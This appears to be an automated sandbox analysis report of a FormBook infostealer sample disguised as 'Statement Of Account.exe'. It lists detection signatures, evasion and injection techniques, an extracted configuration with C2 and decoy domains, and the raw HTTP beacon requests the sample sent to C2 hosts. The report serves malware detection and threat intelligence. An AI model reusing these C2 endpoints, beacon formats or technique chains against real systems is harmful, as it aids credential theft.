Windows Analysis Report
Statement Of Account.exe

Overview

General Information

Sample name: Statement Of Account.exe
Analysis ID: 1430501
MD5: da68e8ff4e0c0d00c613fa9301cf4a37
SHA1: 7456cf2540dce6403407b532c502ce5abb07e9ec
SHA256: b7def3af905789a4ecedcc226d91592d8bc758ce8c5458d62ef435707de8670f
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Found malware configuration
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lolabeautystudios.com/gs12/"], "decoy": ["juniavilela.com", "italiahealth.club", "freefoodpro.com", "qqmotor.co", "mosahacatering.com", "wocc.club", "tourly360.com", "airzf.com", "eternalknot1008.com", "pons.cc", "zdryueva.com", "bodution.website", "vip8g100013.top", "3box.club", "bestoffersinoneplace.com", "tronbank.club", "hlysh.live", "allfireofferapp.sbs", "goldenvistaservices.com", "theconfidencebl-youprint.com", "doping.digital", "urxetqt.com", "utahdatecoach.com", "coworkingvalencia.pro", "thebeautybarandco.com", "umastyle.club", "demandstudiosnews.com", "k2securityhn.com", "teacakesandtadpoles.com", "epacksystems.network", "y2llvq.vip", "udin88b.us", "simonettipressurewashing.com", "baansbliss.com", "messyplayclub.com", "panaco.co", "kustomequipment.com", "actnowgreen.com", "tallawahyouthfoundation.com", "novistashop.com", "oversight418354.email", "ypsom.info", "enerableoffi.club", "otirugkyt.com", "mappedbyamanda.com", "vibelola.com", "nexelab.com", "zgcple.info", "maiores-veritatis.com", "wonderdread.cloud", "signomo.com", "uspsdirect.shop", "finessebuilding.com", "heavydutywearpart.com", "51win.ink", "b-a-s-e.net", "xianqianjin.fun", "domscott.art", "rtp-tambakslot5000.site", "sports565.com", "kpi-finder.com", "taylor.capital", "1993520.xyz", "hjgd.xyz"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe ReversingLabs: Detection: 23%
Multi AV Scanner detection for submitted file
Source: Statement Of Account.exe ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Statement Of Account.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Statement Of Account.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Statement Of Account.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: colorcpl.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmstp.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmstp.pdb source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: IuBP.pdb source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: IuBP.pdbSHA256 source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop esi 14_2_00417322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 14_2_00416CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 14_2_00417D70

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49748 -> 154.12.38.29:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 91.195.240.94:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49751 -> 34.149.87.45:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 160.124.174.163:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.12.38.29 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.149.87.45 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.lolabeautystudios.com/gs12/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 HTTP/1.1Host: www.airzf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 HTTP/1.1Host: www.b-a-s-e.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /gs12/?r6-=993VfXh0jqtko3ENU03aV9e2gnwjzkI9tuLx/ah8zkvGCI6r8A517lqbkaAk6P8eMjr8&YN=9rKtZn5 HTTP/1.1Host: www.zdryueva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View IP Address: 34.149.87.45 34.149.87.45
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View ASN Name: UNMETEREDCA UNMETEREDCA
Source: Joe Sandbox View ASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 9_2_0F904F82 getaddrinfo,setsockopt,recv, 9_2_0F904F82
Source: global traffic HTTP traffic detected: GET /gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 HTTP/1.1Host: www.airzf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 HTTP/1.1Host: www.b-a-s-e.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /gs12/?r6-=993VfXh0jqtko3ENU03aV9e2gnwjzkI9tuLx/ah8zkvGCI6r8A517lqbkaAk6P8eMjr8&YN=9rKtZn5 HTTP/1.1Host: www.zdryueva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.airzf.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8X-Wix-Request-Id: 1713890667.07612762899732525067Age: 0Server: PepyakaX-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Tue, 23 Apr 2024 16:44:27 GMTX-Served-By: cache-chi-kigq8000037-CHIX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkqHFWhjPEXyPTSLtPMFnp4a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalmBQ2QY4hzEJNVep8btjXtN21kVvhi4WWi737JqnyfsKzRUqbJQEwoR5t7fXMpcLTA==,2UNV7KOq4oGjA5+PKsX47P9efI/myzj/9e1V5kpi0zpYgeUJqUXtid+86vZww+nL,9DY27ey9PtG1M7AzVTPSAeIGguIVY9cIsA/DsRO7DrY=,g2aKszYfRloBamvU9+FSKbaI/koc3kS7zllmkFk7bZc=,0gGrL7iazMoiuqlb7dEO3Xp6cxvAmf0V9RlaNBeq9FVSB88D0lWBQzqUldF0H79KCJgk4i4ryDgNOsmaMtz63A==Transfer-Encoding: chunkedVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 62 66 32 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 Data Ascii: bf2 <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'pag
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000009.00000002.2947771554.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000009.00000002.2945097297.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2948147154.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1719884903.0000000007F40000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: Statement Of Account.exe, 00000000.00000002.1703144585.0000000003150000.00000004.00000800.00020000.00000000.sdmp, SdYCcXyq.exe, 0000000B.00000002.1741610690.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.airzf.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.airzf.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.airzf.com/gs12/www.b-a-s-e.net
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.airzf.comReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b-a-s-e.net
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b-a-s-e.net/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b-a-s-e.net/gs12/www.zdryueva.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b-a-s-e.netReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.baansbliss.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.baansbliss.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.baansbliss.com/gs12/www.otirugkyt.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.baansbliss.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bodution.website
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bodution.website/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bodution.website/gs12/www.juniavilela.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bodution.websiteReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.demandstudiosnews.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.demandstudiosnews.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.demandstudiosnews.com/gs12/www.heavydutywearpart.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.demandstudiosnews.comReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.goldenvistaservices.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.goldenvistaservices.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.goldenvistaservices.comReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.heavydutywearpart.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.heavydutywearpart.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.heavydutywearpart.com/gs12/www.goldenvistaservices.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.heavydutywearpart.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hjgd.xyz
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hjgd.xyz/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hjgd.xyz/gs12/www.bodution.website
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hjgd.xyzReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.juniavilela.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.juniavilela.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.juniavilela.com/gs12/www.lolabeautystudios.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.juniavilela.comReferer:
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kustomequipment.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kustomequipment.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kustomequipment.com/gs12/www.novistashop.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kustomequipment.comReferer:
